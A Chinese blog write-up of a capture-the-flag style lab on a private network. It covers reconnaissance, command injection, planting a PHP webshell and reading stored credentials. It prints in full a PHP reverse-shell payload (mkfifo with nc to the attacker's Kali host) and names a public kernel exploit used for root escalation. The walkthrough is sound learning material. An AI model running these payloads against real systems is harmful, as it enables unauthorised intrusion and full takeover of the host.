对目标靶机进行信息收集,利用arp-scan -l 或nmap获取同网段的ip地址
kali ip:192.168.56.104,靶机ip地址:192.168.56.118
对靶机端口进行探测,命令在之前的项目中都有。
发现了21、80端口,对其80端口进行访问,发现了/site/目录
点击后进入主页,发现了三个标签,在主页到处点点
发现在标签buscar处出现了下图的地址
浅浅的试一下看有没有远程命令执行漏洞,果不其然
那就可以反弹shell了,但是,试了好几个,都不行,猜测应该是做了某些限制,那就换种思路
反弹失败,利用echo,向一个php文件写入一句话木马,然后利用蚁剑进行连接
连接成功,经过一番搜寻后发现了个和项目名字一样的用户名,里面有个user.txt
查看后发现是一串字符串
然后找到了config.php文件,发现了用户名和密码
同时在另一个地方也发现备份文件,里面有用户名和密码
试着登录ftp服务器,找了一圈没什么可以用的
虽然已经用蚁剑连接了,但是没有getshell还是不太舒服,在蚁剑的终端里写个反弹shell的文件2.php,具体内容如下所示:
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.104 443 >/tmp/f");?>尝试了很多端口都不行,这个443端口可以,猜测应该是做了限制。在kali上开启监听,在web端访问这个文件,反弹成功!
查看服务器是否安装了python,利用python改成交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
收集下linux信息,发现是ubuntu16.04 4.4.0版本
在本地看看有没有可以用的exp,发现了45010.c文件,该文件能本地提权
将其复制到项目文件里,然后可以用蚁剑上传,也可以开启kali的web服务,在shell中下载
这边选择方便的蚁剑进行上传
上传之后进行编译,输出为exp1,给exp1赋权,执行exp1
提权成功!获取了最后的flag文件!
最近比较忙!找个简单的项目练练手感,还是不错的。
每天学习一丢丢,进步一丢丢!
2653
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
